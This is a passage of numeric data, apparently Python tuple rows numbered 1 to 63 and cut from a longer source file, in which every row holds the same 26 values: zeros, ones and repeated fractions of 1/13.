(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 1
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 2
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 3
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 4
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 5
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 6
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 7
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 8
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 9
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 10
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 11
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 12
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 13
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 14
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 15
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 16
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 17
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 18
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 19
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 20
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 21
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 22
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 23
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 24
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 25
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 26
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 27
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 28
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 29
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 30
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 31
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 32
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 33
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 34
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 35
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 36
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 37
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 38
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 39
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 40
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 41
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 42
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 43
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 44
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 45
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 46
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 47
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 48
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 49
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 50
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 51
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 52
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 53
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 54
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 55
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 56
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 57
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 58
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 59
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 60
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 61
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 62
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 63
